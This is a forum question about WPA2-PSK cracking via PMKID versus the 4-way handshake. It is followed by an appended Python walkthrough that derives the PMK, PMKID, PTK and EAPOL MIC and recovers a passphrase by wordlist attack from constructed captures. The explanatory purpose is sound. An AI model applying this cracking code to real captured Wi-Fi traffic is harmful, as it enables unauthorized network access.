Understanding EAPOL 4-Way Handshake and PMKID cracking
#1
Hello!

I read how cracking WPA2-PSK works and it seems to boil down to either capturing the entire 4-way handshake or just the PMKID, if the access point broadcasts it, and then running hashcat. Now, I have a few questions.

#1: Is capturing the PMKID preferable over capturing the entire 4-way handshake? From what I understand, both provide you with enough information for cracking the PMK (which is the actual access key, if I'm not mistaken), and that means you'll find the PSK (the secret passphrase) once hashcat is finished. The PMKID is much easier to get since it doesn't require any clients to connect to the access point. If in both cases I only need to crack the PMK, does that mean that it takes the same amount of time with both attacks, or is the handshake method slower to crack because I need to feed hashcat more data?

#2: It seems that in the end capturing a handshake or PMKID is just a way to have a file for hashcat to work on. I mean, one could also stand in front of the access point and try connecting with all possible password combinations, but I guess that would take much longer, hence why having a capture file to crack offline is much more convenient. Is this correct?

#3: If an access point doesn't broadcast the PMKID, a 4-way handshake attack is always viable unless the access point is using enterprise security protocols, right? Also, I suppose that to improve my defense against this type of attack, using a complex long passphrase helps a lot.

Please, correct me if I'm wrong. Thanks in advance!
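Worked example, added here and not part of the thread or of hashcat's own code: it walks through the WPA2-PSK key derivation the questions above refer to (passphrase and SSID -> PMK via PBKDF2-HMAC-SHA1, PMK -> PMKID via HMAC-SHA1 with the "PMK Name" label, PMK -> PTK via PRF-512, KCK -> EAPOL-Key MIC over message 2) and then runs a small offline wordlist attack against both a "captured" PMKID and a "captured" message 2. A counter on the PBKDF2 step makes visible that each attack spends exactly one PBKDF2 per candidate; the handshake path only adds a PRF-512 and one more HMAC on top, which is cheap next to 4096 PBKDF2 rounds. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demo; the EAPOL-Key frame is a minimal message 2 with empty key data (a real capture also carries the RSN IE), and the helper that emits a hashcat mode 22000 PMKID line is an assumption about that line's layout, not something produced by hashcat itself.

```python
"""Constructed WPA2-PSK key-derivation walkthrough: PMK -> PMKID and PMK -> PTK -> EAPOL MIC,
plus a toy offline wordlist attack against each. Every 'capture' here is built in this file."""
import hashlib
import hmac

# --- constructed network parameters (not a real network) ---
SSID = "demo-ssid"
AP_MAC = bytes.fromhex("02aabbccddee")   # locally administered, constructed
STA_MAC = bytes.fromhex("021122334455")  # constructed
ANONCE = bytes(range(32))                # constructed nonces
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81                          # MIC field offset inside an EAPOL-Key frame
PBKDF2_CALLS = {"n": 0}                  # counts the expensive step per candidate

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes). This is the slow part."""
    PBKDF2_CALLS["n"] += 1
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))   # 4 x 160 bits covers 512 bits
    return out[:64]                     # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]

def eapol_mic(kck: bytes, frame_with_zeroed_mic: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16], MIC field zeroed first."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]

def build_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP) with an all-zero MIC field and empty key data."""
    body = (b"\x02"                    # descriptor type: RSN
            + b"\x01\x0a"              # key info: HMAC-SHA1 MIC (version 2), pairwise, MIC bit set
            + b"\x00\x10"              # key length
            + (1).to_bytes(8, "big")   # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID
            + bytes(16)                # MIC placeholder (zeroed)
            + b"\x00\x00")             # key data length (constructed frame carries no RSN IE)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type EAPOL-Key

def sign_msg2(passphrase: str) -> bytes:
    """What the real client does: PMK -> PTK -> KCK -> MIC over message 2."""
    pmk = derive_pmk(passphrase, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_msg2(SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]

def crack_pmkid(captured_pmkid, ssid, ap_mac, sta_mac, wordlist):
    """Offline attack on a PMKID: one PBKDF2 + one HMAC per candidate."""
    for cand in wordlist:
        if hmac.compare_digest(pmkid(derive_pmk(cand, ssid), ap_mac, sta_mac), captured_pmkid):
            return cand
    return None

def crack_handshake(captured_msg2, ssid, ap_mac, sta_mac, anonce, wordlist):
    """Offline attack on message 2: one PBKDF2 + PRF-512 + one HMAC per candidate."""
    snonce = captured_msg2[17:49]                      # SNonce follows the 17 bytes of headers
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    for cand in wordlist:
        kck = derive_ptk(derive_pmk(cand, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return cand
    return None

def hashcat_22000_pmkid_line(captured_pmkid, ap_mac, sta_mac, ssid) -> str:
    """Assumed layout of a hashcat mode 22000 PMKID line: WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID(hex)***"""
    return f"WPA*01*{captured_pmkid.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"

if __name__ == "__main__":
    real = "correct horse battery"                               # constructed passphrase
    wordlist = ["password", "letmein", real, "qwerty123"]        # constructed wordlist
    cap_pmkid = pmkid(derive_pmk(real, SSID), AP_MAC, STA_MAC)   # "captured" from message 1
    cap_msg2 = sign_msg2(real)                                   # "captured" message 2
    print(hashcat_22000_pmkid_line(cap_pmkid, AP_MAC, STA_MAC, SSID))
    print("PMKID attack ->", crack_pmkid(cap_pmkid, SSID, AP_MAC, STA_MAC, wordlist))
    print("Handshake attack ->", crack_handshake(cap_msg2, SSID, AP_MAC, STA_MAC, ANONCE, wordlist))
```

Running the script prints the 22000-style line and recovers the planted passphrase from both captures. Both loops stop at the same candidate after the same number of PBKDF2 calls, which is where almost all of the cracking time goes; in practice you would hand the real capture to hashcat (mode 22000 accepts both PMKID and EAPOL entries) rather than loop in Python, and the only defensive lever visible in this code is the passphrase itself, since SSID, MACs and nonces are all public.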


Messages In This Thread
Understanding EAPOL 4-Way Handshake and PMKID cracking - by kiwil3mon - 03-31-2020, 02:37 AM